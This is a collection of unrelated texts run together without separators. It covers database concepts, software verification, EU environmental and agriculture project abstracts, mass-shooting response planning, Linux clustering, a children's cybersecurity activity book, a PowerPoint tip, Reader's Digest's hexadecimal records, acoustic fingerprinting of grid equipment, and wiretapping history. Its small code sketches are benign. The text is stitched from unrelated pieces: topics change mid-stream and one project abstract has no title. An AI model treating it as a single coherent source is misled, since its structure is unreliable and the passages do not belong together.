- OLTP System - Online Transaction Processing (OLTP) systems are able to process a large number of concurrent database query and update requests in real time. The information technology part of a business transaction is called an online transaction, or simply 'transaction'. It is performed through the execution of an application program that accesses one or more shared databases within the business information system. A transaction is a complex update operation consisting of a structured sequence of read and write operations. Ideally, a transaction satisfies the ACID properties. Business information systems are primarily OLTP systems. In almost every sector - manufacturing, education, health care, government, and large and small businesses - OLTP application systems are relied upon for everyday administrative work, communication, information gathering, and decision making. The first OLTP application in widespread use was the airline reservation system SABRE, developed in the early 1960s as a joint venture between IBM and American Airlines. This system connects several hundred thousand nodes (user interface devices) and has to handle several thousand update request messages per second.

- Object-Relational Databases (ORDBs) - have evolved from relational databases by adding several extensions derived from conceptual modeling requirements and from object-oriented programming concepts. One can view the evolution of relational to object-relational databases in two steps. First, the addition of abstract data types (ADTs) allows complex-valued tables. ADTs include user-defined base types and complex types together with user-defined functions and type predicates, and the possibility to form a type hierarchy where a subtype of a tuple type inherits all attributes defined for it. Second, the addition of object identity, object references and the possibility to define subtables within an extensional subclass hierarchy allows object tables. There are two notable differences between object-relational databases and object-oriented programming. First, object IDs in ORDBs are logical pointers. They are not bound to a physical location (like C++ pointers). Second, in addition to the intensional subtype hierarchy of the type system, ORDBs have an extensional subclass (or subtable) hierarchy that respects the subtype relationships defined in their type system.
ORDBs allow the seamless integration of multimedia data types and large application objects, such as text documents, spreadsheets and maps, with the fundamental concept of database tables. Many object-relational extensions have been included in SQL-99.

- Object-Oriented Database (OODB) - Historically, the successful application of object-oriented programming languages such as Smalltalk, C++ and Java has led to the development of a number of so-called 'object-oriented database systems' which support the storage and manipulation of persistent objects. These systems have been designed as programming tools to facilitate the development of object-oriented application programs. However, although they are called database systems, their emphasis is not on representing information by means of tables but rather on persistent object management. Any database concept which is intended as an implementation platform for information systems and knowledge representation must support tables as its basic representation concept on which query answering is based. Tables correspond to extensional predicates, and each table row corresponds to a proposition. This correspondence is a fundamental requirement for true database systems. If it is violated, as in the case of OODBs, one deals with a new notion of database system, and it would be less confusing to use another term instead (e.g. persistent object management system), as proposed in (Kim95).

- Ontology - An ontology explicitly specifies the terms for expressing queries and assertions about a domain in a way that is formal, objective, and unambiguous. This includes the stipulation of terminological relationships and constraints in order to capture key aspects of the intended meaning of the specified terms. An ontology is implicitly defined by a conceptual model (such as an ER or UML model). Communication between agents can only be successful if it is based on a common (or shared) ontology.

- Protocol - A protocol defines the admissible patterns of a particular type of conversation or interaction between agents. Notice that an interaction protocol refers to the communication acts and high-level actions available to agents, whereas a networking protocol refers to message transport mechanisms such as TCP/IP.

- Reaction Rule - SQL databases support a restricted form of reaction rules, called triggers. Triggers are bound to update events. Depending on some condition on the database state, they may lead to an update action and to system-specific procedure calls. In (Wag98) a general form of reaction rules, subsuming production rules and database triggers (or 'event-condition-action rules') as special cases, was proposed. Reaction rules can be used to specify the communication in multi-databases and, more generally, the interoperation between communication-enabled application systems.

- Relational Database (RDB) - As early as 1970, Edgar F. Codd published his pioneering article "A Relational Model of Data for Large Shared Data Banks" in the Communications of the ACM, where he defined the principles of the relational database model. This was the first convincing conceptualization of a general-purpose database model, and it is no accident that it relies on formal logic, providing a clear separation of the conceptual user interface and the underlying implementation techniques. In the mid-eighties, IBM presented DB2, the first industrial-strength implementation of the relational model, which continues to be one of the most successful systems today.
There are now numerous other relational DBMSs that are commercially available. The most popular ones include Informix, Oracle, Sybase and Microsoft SQL Server. To a great extent, the overwhelming success of these systems is due to the standardization of the database manipulation language SQL, originally developed at IBM in the seventies. While most well-established information processing systems and tools such as programming languages, operating systems or word processors have evolved from practical prototypes, the unprecedented success story of the relational database model is one of the rare examples where a well-established and widely used major software system is based on a formal model derived from a mathematical theory (in this case set theory and mathematical logic). Conceptually, a relational database is a finite set of finite set-theoretic relations (called 'tables') over elementary data types, corresponding to a finite set of atomic propositions. Such a collection of atomic sentences can also be viewed as a finite interpretation of the formal language associated with the database in the sense of first-order predicate logic model theory. The information represented in a relational database is updated by inserting or deleting atomic sentences corresponding to table rows (or tuples of some set-theoretic relation). Since a relational database is assumed to have complete information about the domain represented in its tables, if-queries are answered either by yes or by no. There is no third type of answer such as unknown. Open queries (with free variables) are answered by returning the set of all answer substitutions satisfying the query formula.

- Rules - There are various types of rules: business rules, legal rules, calculation rules, derivation rules, production rules, rules of thumb, reaction rules, and many more.

- SQL - is a declarative language for defining, modifying and querying database tables. A table schema is defined with the command CREATE TABLE... and modified with ALTER TABLE... The content of a table can be modified by either adding, deleting, or changing rows using the commands INSERT INTO..., DELETE FROM... and UPDATE... Simple queries are formed with the expression SELECT columns FROM tables WHERE condition. Such a query combines the cross product of the tables with the selection defined by the condition and the final projection to the attributes occurring in the columns list. More complex queries can be formed by nesting such SELECT statements (using subqueries in the WHERE clause), and by combining them with algebraic operators such as JOIN, UNION and EXCEPT. SQL queries correspond to relational algebra expressions and to predicate logic formulas: projection corresponds to existential quantification, join to conjunction, union to disjunction, and difference (EXCEPT) to negation (a small query sketch follows the UML entry below). The most recent version of SQL, SQL-99, includes many object-relational extensions, such as user-defined types for attributes, object references, and subtable definitions by means of CREATE TABLE ... UNDER ...

- TCP/IP - is a networking protocol used to establish connections and transmit data between hosts.

- Unified Modeling Language (UML) - is an established object-oriented modeling standard defined by an industry initiative organized and funded by Rational and led by three prominent figures of the OO modeling community: Booch, Jacobson, and Rumbaugh.
UML recognizes five distinct modeling views: the use-case view for requirements analysis, the logical view for describing the static structure and the behavior of a system, and three implementation views concerning components, concurrency and deployment. Each of these views is composed of several diagrams. A use-case diagram depicts a complete sequence of related transactions between an external actor and the system. The idea is that, by going through all of the actors associated with a system and defining everything they are able to do with it, the complete functionality of the system can be defined. UML class diagrams are a straightforward extension of ER diagrams. In addition to conventional (stored) attributes, class diagrams also list the operations of a class, which may be functions (derived attributes) or service procedures associated with the class. The behavior of a system is modeled by means of four types of diagram: sequence diagrams depict the message exchange between objects arranged in time sequence, where the direction of time is down the page; an alternative way of visualizing the message exchange between objects is offered by collaboration diagrams, which emphasize the associations among objects instead of the time sequence; activity diagrams are used for describing concurrent, asynchronous processing; finally, statecharts represent the state transitions of a system.
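As a small illustration of the query constructs described in the SQL entry above, the following Python/SQLite sketch runs a join, a UNION and an EXCEPT over two toy tables (the table contents are invented). It also shows the stated correspondence with logic: the join expresses a conjunction of conditions, UNION a disjunction, and EXCEPT a negation.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE enrolled (student TEXT, course TEXT);
CREATE TABLE passed   (student TEXT, course TEXT);
INSERT INTO enrolled VALUES ('ann','db'), ('bob','db'), ('ann','ai');
INSERT INTO passed   VALUES ('ann','db');
""")

# Join ~ conjunction: students enrolled in 'db' who have also passed it.
q_join = """
SELECT e.student
FROM enrolled e JOIN passed p
     ON e.student = p.student AND e.course = p.course
WHERE e.course = 'db'
"""

# UNION ~ disjunction: students enrolled in 'db' or in 'ai'.
q_union = """
SELECT student FROM enrolled WHERE course = 'db'
UNION
SELECT student FROM enrolled WHERE course = 'ai'
"""

# EXCEPT ~ negation: students enrolled in 'db' who have not passed it.
q_except = """
SELECT student FROM enrolled WHERE course = 'db'
EXCEPT
SELECT student FROM passed WHERE course = 'db'
"""

for label, query in [("join", q_join), ("union", q_union), ("except", q_except)]:
    print(label, conn.execute(query).fetchall())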
In software project management, software testing, and software engineering, verification and validation (V&V) is the process of checking that a software system meets specifications and that it fulfills its intended purpose. It may also be referred to as software quality control. It is normally the responsibility of software testers as part of the software development lifecycle. In simple terms, software verification is: "Assuming we should build X, does our software actually achieve its goals without any bugs or gaps?" On the other hand, software validation is: "Was X actually what we should have built? Does X actually meet the high level requirements?"
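As a minimal illustration of the verification half of V&V, the Python sketch below checks a small function against its written specification with unit tests; the function and its specification are invented for illustration. Validation, by contrast, cannot be automated this way: it asks whether that specification describes the right product in the first place, which is answered with stakeholders rather than with assertions.

import unittest

def shipping_cost(weight_kg: float) -> float:
    """Hypothetical specification: a flat fee of 5.00 plus 1.50 per kg,
    with free shipping for orders over 20 kg."""
    if weight_kg > 20:
        return 0.0
    return 5.00 + 1.50 * weight_kg

class VerifyShippingCost(unittest.TestCase):
    # Verification: does the implementation meet the written specification?
    def test_basic_rate(self):
        self.assertAlmostEqual(shipping_cost(2), 8.00)

    def test_free_over_threshold(self):
        self.assertEqual(shipping_cost(25), 0.0)

if __name__ == "__main__":
    unittest.main()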
CEOP-AEGIS - Coordinated Asia-European long-term Observing system of Qinghai Tibet Plateau hydro-meteorological processes and the Asian-monsoon systEm with Ground satellite Image data and numerical Simulations Agency: Cordis | Branch: FP7 | Program: CP-SICA | Phase: ENV.2007.4.1.4.2. | Award Amount: 4.46M | Year: 2008 Human life and the entire ecosystem of South East Asia depend upon the monsoon climate and its predictability. More than 40% of the earth's population lives in this region. Droughts and floods associated with the variability of rainfall frequently cause serious damage to ecosystems in these regions and, more importantly, injury and loss of human life. The headwater areas of seven major rivers in SE Asia, i.e. the Yellow River, Yangtze, Mekong, Salween, Irrawaddy, Brahmaputra and Ganges, are located in the Tibetan Plateau. Estimates of the Plateau water balance rely on sparse and scarce observations that cannot provide the required accuracy, spatial density and temporal frequency. Fully integrated use of satellite and ground observations is necessary to support water resources management in SE Asia and to clarify the roles of the interactions between the land surface and the atmosphere over the Tibetan Plateau in the Asian monsoon system. The goal of this project is to: 1. Construct out of existing ground measurements and current / future satellites an observing system to determine and monitor the water yield of the Plateau, i.e. how much water is finally going into the seven major rivers of SE Asia; this requires estimating snowfall, rainfall, evapotranspiration and changes in soil moisture; 2. Monitor the evolution of snow, vegetation cover, surface wetness and surface fluxes and analyze the linkage with convective activity, (extreme) precipitation events and the Asian Monsoon; this aims at using the monitoring of snow, vegetation and surface fluxes as a precursor of intense precipitation, towards improving forecasts of (extreme) precipitation in SE Asia. A series of international efforts was initiated in 1996 with the GAME-Tibet project. The effort described in this proposal builds upon 10 years of experimental and modeling research, and the consortium includes many key players and pioneers of this long-term research initiative. Agency: Cordis | Branch: H2020 | Program: RIA | Phase: SFS-02a-2014 | Award Amount: 7.97M | Year: 2015 FATIMA addresses effective and efficient monitoring and management of agricultural resources to achieve optimum crop yield and quality in a sustainable environment. It covers both ends of the scale relevant for food production, viz., precision farming and the perspective of a sustainable agriculture in the context of integrated agri-environment management. It aims at developing innovative and new farm capacities that help the intensive farm sector optimize its external input (nutrients, water) management and use, with the vision of bridging sustainable crop production with fair economic competitiveness. Our comprehensive strategy covers five interconnected levels: a modular technology package (based on the integration of Earth observation and wireless sensor networks into a webGIS), a field work package (exploring options of improving soil and input management), a toolset for multi-actor participatory processes, an integrated multi-scale economic analysis framework, and an umbrella policy analysis set based on indicator, accounting and footprint approaches.
FATIMA addresses and works with user communities (farmers, managers, decision makers in the farm and agribusiness sector) at scales ranging from the farm, through the irrigation scheme or aquifer, to the river basin. It will provide them with maps of fertilizer and water requirements (to feed into precision farming machinery), crop water consumption and a range of further products for sustainable cropping management supported with innovative water-energy footprint frameworks. All information will be integrated in leading-edge participatory spatial online decision-support systems. The innovative FATIMA service concept considers the economic, environmental, technical, social, and political dimensions in an integrated way. FATIMA will be implemented and demonstrated in 8 pilot areas representative of key European intensive crop production systems in Spain, Italy, Greece, Netherlands, Czech Republic, Austria, France, Turkey. Agency: Cordis | Branch: FP7 | Program: CP | Phase: SPA.2010.1.1-04 | Award Amount: 3.04M | Year: 2010 SIRIUS addresses efficient water resource management in water-scarce environments. It focuses in particular on water for food production with the perspective of a sustainable agriculture in the context of integrated river-basin management, including drought management. It aims at developing innovative and new GMES service capacities for the user community of irrigation water management and sustainable food production, in accordance with the vision of bridging and integrating sustainable development and economic competitiveness. SIRIUS merges two previously separate strands of activities, those under the umbrella of GMES, related to land products and services (which address water to some extent), and those conducted under FP5/6-Environment and national programs, related to EO-assisted user-driven products and services for the water and irrigation community. As such, it will draw on existing GMES Core Services as much as possible, by integrating these products into some of the required input for the new water management services. It also makes direct use of the EO-assisted systems and services developed in the FP6 project PLEIADeS and its precursor EU or national projects, like DEMETER, IRRIMED, ERMOT, MONIDRI, AGRASER, all addressing the irrigation water and food production sectors, some of which have resulted in sustainable system implementation since 2005. SIRIUS addresses users (water managers and food producers) at scales ranging from the farm, through the irrigation scheme or aquifer, to the river basin. It will provide them with maps of irrigation water requirements, crop water consumption and a range of further products for sustainable irrigation water use and management under conditions of water scarcity and drought, integrated in leading-edge participatory spatial online decision-support systems. The SIRIUS service concept considers the economic, environmental, technical, social, and political dimensions in an integrated way.
A rapid, safe and successful response to a mass shooting incident requires preparation. The likelihood of a mass shooting is low, but schools, colleges and public safety officials must prepare for these situations. Recent mass shootings have demonstrated the need to prepare local, regional, state and federal resources for these events. Emergency managers and public safety agencies must adapt to society's changes so that appropriate delivery of emergency services is ensured in a crisis. The guidelines and procedures discussed here should not replace common sense and experience. It's impossible to plan for every situation that may occur. New best practices and lessons learned are available on an ongoing basis. These emergency response plans should be updated regularly. The goal of this article is to prepare first responders, emergency managers, school officials and others with the basic tools and information needed to develop or assess a multiagency plan for preparing and responding to a mass shooting. Emergency management, law enforcement, fire and emergency medical services (EMS) all share some of the same priorities during a mass shooting, and these include safety and incident stabilization. Therefore, planning and interagency cooperation should be paramount for all types of critical incidents. There is tremendous need for a coordinated effort among all agencies to ensure a safe and effective response. No two shootings are the same, though responder safety is paramount during this type of event. Factors like the shooter's motive, his or her weapons, knowledge of the location and number of staff and visitors can all influence an incident's outcome. Preparation is the key and it includes a clear idea of your actions before the incident occurs. The first step of preparation is a review of your jurisdiction's guidelines and procedures - if they exist - for responding to a mass shooting. Another important step is to bring all the key agencies together, such as law enforcement, fire, EMS, emergency management, hospitals, school systems and colleges. Every jurisdiction, big or small, should have a Local Emergency Planning Committee or a Terrorism Task Force in order to provide a foundation for this planning effort. As with any multihazard assessment and planning process, it's a great idea to do a multiagency exercise (i.e., tabletop or functional) that brings all the key agencies together and rehearses the plan. Initially all the critical agencies should meet to discuss the planning effort for these types of events. One of the first steps this group can take is "target identification" for a mass shooting event that includes elementary schools, high schools, colleges and universities, and high-profile businesses.
Learn Your Linux Clustering Options

"Cluster" is probably the most heavily abused term in the computing world. In this article we'll talk about what a cluster really is, and give an overview of the Linux technologies that can help you implement various types of clusters. The main focus will of course be on building clusters for highly available services. There are three basic types of clustering technologies, and each of them clusters resources in a different manner, at a different level.

High Performance Computing uses clusters to gain absurd computational capacity. Scyld is an example of HPC clustering, and so are LAM/MPI and MPICH. The MPI-based clusters require an application that can take advantage of the cluster. HPC is for computationally intensive tasks, where the work can be broken up into many tasks for execution on various nodes. Your standard single-threaded application won't run on these clusters. Scyld-like clusters are similar, in that they require your application to be spawning many compute tasks, but Scyld will present the cluster as a single machine. On the head node, or master, you will see every single process that's running on the various nodes—it's quite cool! This does mean that you'll be running a custom-built kernel, of course.

But the real question is how to set up a cluster to attain redundant and highly available services. Especially services that are potentially a single point of failure, like NFS servers, e-mail servers, and Web servers. There are two options.

High Availability clusters are focused on redundancy. If a critical server explodes, a standby can take over instantly. This is normally accomplished by having the standby server monitor with something as simple as a ping, or as complex as a program to check that the specific service is responding properly. The Linux-HA project provides the Heartbeat program, which is used by standby servers to verify the health of the active server. It also provides failover functionality and IP address management. There are problems with HA configurations, however. In a perfect world, we could just throw up two NFS servers with access to the same storage, and let them fight it out. This doesn't work, but there are cluster-aware file systems that allow multiple active nodes to utilize the storage simultaneously. Throwing databases at clusters is troublesome as well, since data can be left in an inconsistent state when one node fails. Sun Cluster, Linux-HA, and Piranha are all examples of high-availability cluster technologies.

Load Balancing is where one point of contact will dole out jobs to other nodes. The master node can be a single point of failure, so HA clustering is normally used to provide redundant head nodes. Load balancing doesn't even have to be about "clustering." It can be done with network equipment as well as software. Software-based solutions are normally a bit smarter, however; they can monitor the load and responsiveness of the backend nodes, and then send traffic to the most available server. The most widely known load balancing cluster product is the Linux Virtual Server project, or LVS. LVS operates at a higher level than other technologies. Instead of trying to provide a transparent set of nodes to run processes on, it load balances at the network level. The advantage is that nearly anything can be run on an LVS cluster, assuming it communicates via TCP or UDP. Piranha, the Red Hat cluster software, uses LVS as well. LVS is really just a glorified proxy server, when you think about it.
It does operate at layer 4, though, so it doesn't need to understand the layer 7 protocols you're trying to balance, which is a great advantage. So the question remains: what method of clustering should one use? It really depends on the goals of the server. If you want to implement an NFS server cluster, you're in for a world of hurt. You will run into problems for many reasons, the foremost being locking and the fact that NFS isn't really stateless. To implement a cluster with a shared file system you really must invest in something like GFS or Veritas. Most often, people are looking for a way to provide a cluster of Web, mail, or other similar servers. The solution is usually going to be something LVS related, if not LVS itself. TurboLinux Cluster, Red Hat High Availability Server, and many others all use LVS. Kimberlite does not use LVS, and it seems highly recommended by numerous people. Kimberlite runs services in a highly available active-active configuration, with shared storage. When one node is unavailable, the other starts up the missing services and keeps plugging along. And wouldn't you know, there are probably 50 other cluster options that we haven't mentioned here. The most common are LVS and Linux-HA, and note that Linux-ha.org is quite different from Linuxha.net. Yes, it is quite confusing. SUSE Linux ships with Linux-HA (Heartbeat) installed and ready to use. Red Hat Cluster is another option, and of course you can also roll your own solution using the myriad of available technologies. Just remember to read and understand the drawbacks and limitations of the cluster solution you choose—they all have limitations.
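To make the high-availability idea concrete, here is a small Python sketch of the monitor-and-fail-over loop that packages such as Heartbeat implement far more robustly. It is not the Heartbeat program itself: the health check, the timing values and the takeover action are simplified stand-ins chosen for illustration (the service address uses a documentation-only IP range).

import socket
import time

ACTIVE_NODE = ("192.0.2.10", 80)   # hypothetical active server and service port
CHECK_INTERVAL = 2                 # seconds between health checks
FAILURES_BEFORE_TAKEOVER = 3       # tolerate brief hiccups before failing over

def service_is_up(host_port, timeout=1.0):
    """Crude health check: can we open a TCP connection to the service?"""
    try:
        with socket.create_connection(host_port, timeout=timeout):
            return True
    except OSError:
        return False

def take_over():
    """Stand-in for the real failover action: claiming the service IP,
    mounting shared storage, starting the service, and so on."""
    print("active node unreachable -- standby taking over the service")

def standby_loop():
    failures = 0
    while True:
        if service_is_up(ACTIVE_NODE):
            failures = 0
        else:
            failures += 1
            if failures >= FAILURES_BEFORE_TAKEOVER:
                take_over()
                break
        time.sleep(CHECK_INTERVAL)

if __name__ == "__main__":
    standby_loop()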
The Cynja Field Instruction Manual

An activity book for trainee cyberheroes!

Book Overview

Summary: Today, our battlefield is a new frontier, one that's invisible to all but those with cyber powers. It's time to train a new kind of superhero – one who will protect cyberspace from attack! Join the Cynsei, as he helps you acquire cyber powers to fight zombies, worms and botnets. The world needs boys & girls with the digital smarts to become Cynjas and keep the Internet safe for all. Crack open The Cynja Field Instruction Manual and learn how to be a cyberhero!

About the Book: A companion activity book for The Cynja Volume 1, The Cynja Field Instruction Manual is a place where kids can practice the lessons learned from their favorite cyberheroes. Our kids today are living in a digital world where they need the smarts and savvy to navigate the increasing threats they'll face online. Authors Heather C. Dahl and Chase Cunningham, along with artist Shirow Di Rosso, have all worked in the cybersecurity industry and designed the fun activities inside this Manual to teach digital life skills to kids and inspire the next generation of real-life information security warriors. Stories, puzzles, coloring pages, mazes… these are cool interactive methods to give kids hands-on experience with the fundamental technology concepts introduced in Volume 1. The Field Instruction Manual is the perfect activity book for any kid interested in computers, any adult who loves puzzles and games, and moreover is an awesome resource for anyone who wants to learn more about cybersecurity.

"The team behind this new activity book wants kids to become Cynjas—a mashup of the words cyber and ninja—in order to keep the Internet safe for all. The book combines high energy coloring pages and hands-on crafts created by illustrator and IT engineer Shirow Di Rosso, along with educational exercises like password creation, malware identification and a four-page spread focused on the history of computers."

"The kids in our lives were spending their time coloring activity books about old-school bad guys like dragon slayers even though digital monsters were invading their computers," said co-author and tech researcher Heather C. Dahl. "So we decided it was time to give the coloring book an upgrade and create a fun manual that could teach kids a really valuable life lesson—how to make smart choices in cyberspace."

The Cynja Field Instruction Manual follows on from The Cynja Volume 1 and encourages kids to practice the "super cyber powers" they learned in the authors' debut book. The creators have garnered consistent high praise for their clever storytelling, superb illustrations and for "filling a gap in children's literature" with their "geekily accurate" narrative.

"I created The Cynja book series for my two daughters. It's important for my girls and kids to learn more about cybersecurity," explained co-author and threat intelligence analyst Chase Cunningham. "We're facing a shortage of professionals in my industry, so my hope is The Cynja Field Instruction Manual might inspire some of its young readers to join me in fighting bad guys online." - Help Net Security
If you want to highlight certain points or ideas in your PowerPoint presentation but the laser pointer isn't quite cutting it, you can try another tactic. Here's how to draw on your presentation to help get your point across.
- First, you have to be in Slide Show mode. Head to Slide Show at the top of your screen > From Beginning.
- Once you've got your slides running, use the keyboard shortcut CTRL+P in order to access the pen.
- It's going to just look like a small dot, but if you click and hold down with your mouse, you can draw on your slides.
- You can use it to draw arrows on the fly, or circle important content to help make things clear to people. You can also draw pictures to help explain things (if that happens to be a skill of yours!)
- To erase, just hit "E" and you'll erase the last thing you've drawn.
- To hide the pen, just hit CTRL+H.
A Hex in Computing
By Tom Steinert-Threlkeld | Posted 2005-07-08

The practical reality, in the early days, was much more prosaic. There wasn't much discussion of "data warehousing" or "data mining" or anything you might want to call "business intelligence." In fact, before the Univac II came along, Reader's Digest's data warehouse consisted of 18 million stencils, little metal plates with subscribers' names, addresses and expiration dates on the front. They were used to create mailing labels, by pressing ink on them. Their edges were notched, to add marketing information to stencils selected for marketing campaigns. Several rooms in the company's headquarters were devoted to this "prehistoric" system, as Otten terms it. About 100 women and men would toil in a stencil room, making sure each stencil was in the right sequence in the right tray for the right postal code. And, once removed, returned to its right place.

What they couldn't do was easily put customers in buckets they could do something with, like sell customers a new book or record. Or just simply put names in alphabetical order without shuffling cards by hand. With the new file system and the battery of IBM 360s, they finally had a way of putting order into the universe. "It was wonderfully awesome to do a sort of 10 million names," Burns says. Being able to sort millions of records by name, state or street address was not the point. Figuring out what prompted each customer to buy more products was the mystery worth solving. For Burns and 29 other programmers, that meant devising a schema that would compact a record of any offer made to any customer in an "atomic record" of four bytes per event. One byte would record the name of the product; a second the action that resulted (promoted, paid bill, canceled, etc.); a third the type of marketing effort (direct mail piece, house ad, etc.) that spurred the action; and another the month and year of the mailing or other marketing campaign.

Each byte mattered in an era of expensive hardware and expensive memory. IBM had spent $5 billion in 1964 ($28 billion in today's dollars) just to launch the 360. In fact, Reader's Digest programmers had to figure out how to squeeze lots of information into fields that might only be one byte long. That meant writing in hexadecimal code, an approach taken to maximize use of the limited memory of the IBM machines. "That was the nature of the beast," Otten says. Everyday math is based on decimal code: the numbers 0 through 9. The base is 10: the characters you know as numbers. Hexadecimal code takes those 10 numbers and adds six letters. Reader's Digest chose A through F. With decimal code, you can store only 100 different values in two digits: 10 times 10. With hexadecimal code, you can store 256 different values: 16 times 16. Which happens to be the maximum amount of information that can be stored in a byte. IBM, with the 360, established the standard in the computing industry that a byte would be the equivalent of eight bits of information fed to a machine at a time. Those bits were ones or zeroes. Two different values, eight digits, multiplied into all their possible permutations, equals 256. So, November 1987 would become 1C.
November 1994 would be 70 and November 2004 was E8. More than two decades of months and years could be captured in 256 two-character combinations. How could you tell what E8 meant? By looking it up in a table, kept on paper. Or in one's head. Kahrs and Ritchie, the two lead developers, would define much of the foundation of the system, such as what values to put in the compacted fields. Did you need hex codes for active customers? Expired? Deadbeat? Temporary? Gift recipient?

But everyday "users" of the system wouldn't have to know hex code, project manager Otten decided. Key Reader's Digest policies, such as when to stop shipping products to a particular customer, subscription rates and who was entitled to which rate, would be kept in tables that could be pulled up on screen, altered and fed back into the system. That separation of business purpose, and putting it on screen in a form an everyday worker could see and deal with, was "unique" in a period when only gods working in air-conditioned rooms with raised floors could be experts in computing, according to Burns. "To think of the system user was quite advanced," he says. Until then, dabbling in hex code or putting it to any kind of use "was strictly up to the Mr. Wizards and the Mrs. Wizards."
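The one-byte month-and-year code described above is easy to reproduce. The article does not state the epoch, but the three examples it gives (November 1987 = 1C, November 1994 = 70, November 2004 = E8) are consistent with counting months from July 1985, so the Python sketch below assumes that epoch; the assumption is inferred from those examples, not documented.

# One-byte month/year encoding, as described in the article.
# Month zero is assumed to be July 1985 (inferred, not stated).
EPOCH_YEAR, EPOCH_MONTH = 1985, 7

def encode_month(year, month):
    """Return the two-hex-digit byte for a given month and year."""
    n = (year - EPOCH_YEAR) * 12 + (month - EPOCH_MONTH)
    if not 0 <= n <= 255:
        raise ValueError("month falls outside the one-byte range")
    return format(n, "02X")

def decode_month(code):
    """Invert encode_month: turn a hex byte back into (year, month)."""
    n = int(code, 16)
    years, month_index = divmod(EPOCH_MONTH - 1 + n, 12)
    return EPOCH_YEAR + years, month_index + 1

if __name__ == "__main__":
    for y, m in [(1987, 11), (1994, 11), (2004, 11)]:
        print(y, m, "->", encode_month(y, m))   # 1C, 70, E8
    print(decode_month("E8"))                    # (2004, 11)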
A kind of fingerprinting, using the unique noises that emanate from hybrid cyber-physical systems, could be used to thwart the large-infrastructure attacks that some experts think are a danger. Fake, malicious control commands injected into electrical grids and other large-scale hybrid physical and cyber installations could devastate systems. But existing control equipment sometimes can't run encryption; it is often remote, and therefore hard to patch frequently; and it can lack redundancy, so it needs to be kept running. It can't be shut down to be updated like regular networks.

Scientists think that one answer is to harness a major advantage of physical-cyber hybrid equipment: the industrial control performs a physical action, such as turning a valve or switching a motor on. The action not only creates a unique sound, but also takes a specific amount of time to be performed. The theory is that by knowing what those characteristics should be, anomalies such as spoofing can be spotted. "The stakes are extremely high," Raheem Beyah, an associate professor in the School of Electrical and Computer Engineering at the Georgia Institute of Technology, says on the school's website. "But the systems are very different from home or office computer networks," he explains. In the proposed fingerprinting, the scientists use "physics and mathematics to analyze and build a model" based on the equipment, Beyah says. "Schematics and specifications allow us to determine how the devices are actually operating," he says. The team creates computer models to understand the unique device fingerprint. So far, they say they've addressed half of the devices used on the electrical grid and reckon they've demonstrated that their concept works at two electrical substations. The sound and time it takes for a control to perform an action "passively fingerprints different devices that are part of critical infrastructure networks," Beyah says.

It's not the first time that sound has been used to identify things in an industrial context. Sound monitoring is used to predict mechanical failure too. Connecting vibration and ultrasonic Internet of Things sensors to machines lets algorithms predict problems based on the sound the machine makes. I wrote about that equipment last year. If you know what the machine should sound like, and it doesn't sound right, you know there's a problem. I used the analogy of a washing machine spin cycle that's been overloaded. It sounded a lot different to one with the right number of towels in it. That idea is similar to the Georgia Institute of Technology fingerprinting. The spoof doesn't sound right, or take the correct amount of time. It's thus bogus.

Beyah reckons his team's idea also applies to the Internet of Things. Those IoT devices have "specific signatures related to switching them on and off," the Georgia Tech website explains. "There will be a physical action occurring, which is similar to what we have studied with valves and actuators" in the electrical grid scenario, says Beyah. So conceivably small IoT devices could ultimately see future cyber protections that don't involve chip-hogging software. All one might need for IoT security, ultimately, is an adjacent microphone sensor and clock chip, along with a set of algorithms.
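The fingerprinting idea described above comes down to comparing an observed operation against a model of how the device normally sounds and how long its physical action normally takes. The Python sketch below illustrates only the timing half, with invented numbers: it flags a command whose measured actuation time falls too far from the device's learned profile. The Georgia Tech work builds far richer physical models; this shows only the general shape of such a check.

from statistics import mean, stdev

# Hypothetical baseline: actuation times (in seconds) for one valve,
# measured while the device was known to be operating normally.
baseline_times = [2.41, 2.38, 2.44, 2.40, 2.39, 2.43, 2.42, 2.37]
mu, sigma = mean(baseline_times), stdev(baseline_times)

def looks_spoofed(observed_seconds, k=4.0):
    """Flag an operation whose duration deviates more than k standard
    deviations from the device's learned timing fingerprint."""
    return abs(observed_seconds - mu) > k * sigma

if __name__ == "__main__":
    print(looks_spoofed(2.40))   # False: consistent with the fingerprint
    print(looks_spoofed(0.05))   # True: acknowledged far too quickly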
James Lawrence Fly, by Mickie Edwardson (The Historian, Winter 1999)

The use of wiretaps as an investigative tool by government and law enforcement agencies has long been a controversial issue in the United States. According to Birkenstock, wiretapping has been practiced "almost as long as there have been wires to tap."1 While proponents defend the practice as necessary for effective crime control and intelligence gathering, others associate wiretapping with such Bill of Rights violations as illegal search and seizure, self-incrimination, and denial of fair trial. One way to gain understanding of the arguments used during the 80-year debate is through the writings and testimony of James Lawrence Fly (1898-1966), who campaigned against the practice during his years as Federal Communications Commission Chairman (1939-1944) and later as a practicing attorney and a director of the American Civil Liberties Union. For 16 years Fly waged his war in congressional hearings and courts, magazines, newspapers, and network television.

Aside from providing knowledge of issues, Fly's campaign enhances understanding of governmental processes in three ways. First, the fight over wiretapping shows how fear in national emergencies can overcome civil libertarians' arguments and even Supreme Court verdicts to perpetuate a practice that is almost universally regarded with suspicion. Fly's campaign occurred during two such emergencies, World War II and the Cold War. As the century ends, terrorism is causing similar fear, and lawmakers continue to introduce bills to make wiretapping easier for law enforcers. In addition, new wiretapping techniques have arisen from electronic advances such as telephone digital switching systems, cellular telephones, and encryption computer software. Whereas in Fly's time most wiretaps were designed to uncover evidence of crime, since then emphasis has shifted, and many taps are designed for foreign surveillance in which crime is less central.2 Examining the wiretapping controversy over the period of Fly's involvement also shows how legal constraints and social attitudes have changed; even Fly reluctantly came to acknowledge the utility of wiretapping under certain circumstances. Most debates about proposed wiretapping laws centered on four questions: Who should be authorized to approve a tap? How much suspicion justified a tap? What procedures should be followed? And what were the consequences for citizens? Another important issue was whether information from taps could be used as evidence in federal court and under what circumstances. As the nation's interests became more complex, proponents of wiretapping spent five decades specifying conditions under which taps would be permissible. Fly's story illustrates how government policy can evolve from a simple prohibition to a complex accommodation of competing concerns.3 Finally, Fly's campaign illustrates the hazards officials face when they take unpopular stands. He suffered from newspaper columnists questioning his loyalty, from a federal board declaring him a hidden Communist, from congressional committees, and even from difficulties with private business affairs. The punishment Fly suffered makes it easier to understand the silence of many public servants when facing controversy.

Fly's greatest single adversary during the struggle was Federal Bureau of Investigation Director J. Edgar Hoover.
